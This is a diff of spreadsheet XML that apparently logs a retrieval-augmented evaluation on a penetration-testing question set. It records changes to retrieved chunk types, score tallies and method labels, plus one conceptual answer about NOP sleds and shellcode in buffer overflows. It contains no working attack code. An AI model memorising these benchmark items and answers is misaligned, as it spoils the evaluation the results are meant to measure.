       </c>
       <c r="I31" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J31" t="n">
@@ -2504,7 +2505,7 @@
       </c>
       <c r="K31" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2553,7 +2554,7 @@
 preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 129e6ebc-2b06-49e6-92b2-d8afeec326f7, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 129e6ebc-2b06-49e6-92b2-d8afeec326f7, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 8)
@@ -2563,7 +2564,7 @@
       </c>
       <c r="I32" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J32" t="n">
@@ -2571,7 +2572,7 @@
       </c>
       <c r="K32" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2638,7 +2639,7 @@
       </c>
       <c r="K33" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2705,7 +2706,7 @@
       </c>
       <c r="K34" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2757,14 +2758,14 @@
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 4803957c-c81b-46be-9e64-8d0fd54656f2, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I35" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J35" t="n">
@@ -2772,7 +2773,7 @@
       </c>
       <c r="K35" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2819,8 +2820,8 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: dbd9551c-209f-4286-a6ee-99530ee8bc83, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 7bb4428a-25df-481c-9509-36c44aff10d1, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 2c236ca7-35b7-437e-a239-f9aa6274b1a5, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 7)
@@ -2831,7 +2832,7 @@
       </c>
       <c r="I36" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J36" t="n">
@@ -2839,7 +2840,7 @@
       </c>
       <c r="K36" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2887,7 +2888,7 @@
           <t>preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 9024d739-2723-477e-be88-d5fbfabd0bc4, Type: dense, Rank: 7)
@@ -2898,7 +2899,7 @@
       </c>
       <c r="I37" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J37" t="n">
@@ -2906,7 +2907,7 @@
       </c>
       <c r="K37" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -2953,19 +2954,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 3174d3d2-432c-4ee5-9f5d-c8d28c7c6cbe, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: c66b81fc-63d9-4a97-b0ee-e81484cd308f, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 3a63c30d-65d3-426b-982d-39af8b3f0d09, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: c66b81fc-63d9-4a97-b0ee-e81484cd308f, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 3a63c30d-65d3-426b-982d-39af8b3f0d09, Type: sparse, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 858a83cd-a7f8-40d5-b144-5389618e38f9, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I38" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 4, Keyword: 6, Total: 10</t>
         </is>
       </c>
       <c r="J38" t="n">
@@ -2973,7 +2974,7 @@
       </c>
       <c r="K38" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3008,7 +3009,7 @@
       <c r="F39" t="inlineStr">
         <is>
           <t>Answer: Buffer Overflow
-Explanation: A buffer overflow vulnerability is a type of memory corruption flaw that occurs when data is written beyond the boundaries of an allocated memory buffer. This can lead to arbitrary code execution by overwriting adjacent memory locations, including executable code or pointers. In this context, using a NOP sled (a sequence of no-operation instructions) combined with shellcode is a common technique used in exploiting buffer overflow vulnerabilities. The NOP sled increases the reliability of the exploit by creating a larger target for the overflow to hit, which directs execution to the shellcode. This is particularly useful given the variability in memory addresses and system configurations across different machines. While XSS, SQL injection, and CSRF are all serious security concerns, they do not involve memory corruption or control flow alteration directly related to a NOP sled and shellcode.</t>
+Explanation: A buffer overflow vulnerability occurs when a program writes more data into a memory buffer than it can hold, causing the data to overwrite adjacent memory locations. This can lead to arbitrary code execution by redirecting the execution flow to a location within the NOP sled, which then leads to the execution of shellcode. The other options are incorrect because XSS and CSRF are web vulnerabilities exploited via malicious scripts or forged requests manipulated through a user's browser rather than directly corrupting memory or control flow within an application's process. SQL Injection involves sending malicious SQL queries through input fields to manipulate or retrieve data from a database, without involving memory corruption or control flow alteration.</t>
         </is>
       </c>
       <c r="G39" t="inlineStr">
@@ -3020,19 +3021,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 3a63c30d-65d3-426b-982d-39af8b3f0d09, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 3c3355f4-4b92-4733-bfd3-317df7d2ffca, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 3c3355f4-4b92-4733-bfd3-317df7d2ffca, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 737c02e6-85ee-49e9-91aa-b6436494df92, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 831f9734-1696-4ce4-bc1c-6b14be8556f2, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I39" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J39" t="n">
@@ -3040,7 +3041,7 @@
       </c>
       <c r="K39" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3088,11 +3089,11 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: d7c6b93b-b9fd-435f-a3da-ab60cf8385fe, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 42440b95-57e2-465a-9d3c-3ace7070d2a0, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 2c236ca7-35b7-437e-a239-f9aa6274b1a5, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 976bc6d1-b057-4f92-adc9-777e85c542b4, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 85910ce2-6c43-4a0c-80ff-34aad76e9dd5, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 10)</t>
@@ -3100,7 +3101,7 @@
       </c>
       <c r="I40" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J40" t="n">
@@ -3108,7 +3109,7 @@
       </c>
       <c r="K40" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3155,19 +3156,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: aadf4df9-3925-4bce-85a2-9df3030ade1e, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 8b80403b-5bc0-4b8e-8246-dc7a15db7a9f, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 8b80403b-5bc0-4b8e-8246-dc7a15db7a9f, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: a151d480-e4c6-4b63-94f3-d8e0fb70dff8, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 8d1f7c98-1820-4eb2-ad4a-d781b911d08a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: d817eb18-44c3-4ea1-a392-7c74b36c3a26, Type: sparse, Rank: 8)
 cowWhySo-pentest-redteam-steering.md (Chunk: eb48e914-8ae1-4052-9151-aaaf23f52452, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 664f7dd6-24a1-4cd8-9bb1-de9e98a49ce6, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 664f7dd6-24a1-4cd8-9bb1-de9e98a49ce6, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I41" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J41" t="n">
@@ -3175,7 +3176,7 @@
       </c>
       <c r="K41" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3221,11 +3222,11 @@
       <c r="H42" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: daf8e21f-02d4-4b54-a85b-d026b81b3411, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: da8d5790-4c9c-4230-96d7-cd1f71b7c89c, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 9)
@@ -3234,7 +3235,7 @@
       </c>
       <c r="I42" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J42" t="n">
@@ -3242,7 +3243,7 @@
       </c>
       <c r="K42" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3309,7 +3310,7 @@
       </c>
       <c r="K43" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3360,15 +3361,15 @@
 preemware_pentestingeval.pdf (Chunk: 53d92d7b-c5d1-4bbd-bdf4-b29c029a1b9e, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: e14e7566-1002-4675-b5db-65eecaad633c, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: dfa3f47d-5ca2-4a60-aa5e-cd08e2caa4b2, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 75b90e17-4cb8-4c0f-afb1-507ec3415b20, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I44" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J44" t="n">
@@ -3376,7 +3377,7 @@
       </c>
       <c r="K44" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3425,17 +3426,17 @@
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: sparse, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 9eff9f90-a6af-4772-be1c-2b9c8e1903fc, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 83612a00-ff68-4885-bd22-958afc16e77e, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 4dec9ffa-64db-4e01-93c9-05970e09eb32, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I45" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J45" t="n">
@@ -3443,7 +3444,7 @@
       </c>
       <c r="K45" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3493,16 +3494,16 @@
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I46" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J46" t="n">
@@ -3510,7 +3511,7 @@
       </c>
       <c r="K46" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3557,19 +3558,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 65aaba3b-b6aa-40cd-b465-0c716d5eb140, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 6fe9074d-23ef-4574-890d-8b4b12031dc1, Type: sparse, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: sparse, Rank: 4)
 cowWhySo-pentest-redteam-steering.md (Chunk: f9343d42-93a5-4f47-97bb-489ea5cf677a, Type: dense, Rank: 5)
-cowWhySo-pentest-redteam-steering.md (Chunk: fc84618c-065b-4f70-856d-10254a7f3dca, Type: dense, Rank: 6)
-cowWhySo-pentest-redteam-steering.md (Chunk: 0c2db85c-1eea-4150-9a9e-90b5f035d29f, Type: dense, Rank: 7)
-cowWhySo-pentest-redteam-steering.md (Chunk: 7db6aa82-d359-47a7-8351-b29272aba5e5, Type: dense, Rank: 8)
+cowWhySo-pentest-redteam-steering.md (Chunk: fc84618c-065b-4f70-856d-10254a7f3dca, Type: sparse, Rank: 6)
+cowWhySo-pentest-redteam-steering.md (Chunk: 0c2db85c-1eea-4150-9a9e-90b5f035d29f, Type: sparse, Rank: 7)
+cowWhySo-pentest-redteam-steering.md (Chunk: 7db6aa82-d359-47a7-8351-b29272aba5e5, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: e189877f-2ed8-49a5-ae4b-00bb7694f847, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I47" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J47" t="n">
@@ -3577,7 +3578,7 @@
       </c>
       <c r="K47" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3629,14 +3630,14 @@
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 91760caf-fbdc-4056-8c88-441ac7facf0c, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 91760caf-fbdc-4056-8c88-441ac7facf0c, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I48" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J48" t="n">
@@ -3644,7 +3645,7 @@
       </c>
       <c r="K48" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -3692,8 +3693,8 @@
           <t>preemware_pentestingeval.pdf (Chunk: e5cf938e-46c9-4736-89ea-f3dfdcdef41d, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 129e9036-2a16-4301-bb5f-01114fc84281, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: f0173fe8-8eab-43e2-8ab3-d85e378e3eb7, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: dense, Rank: 5)
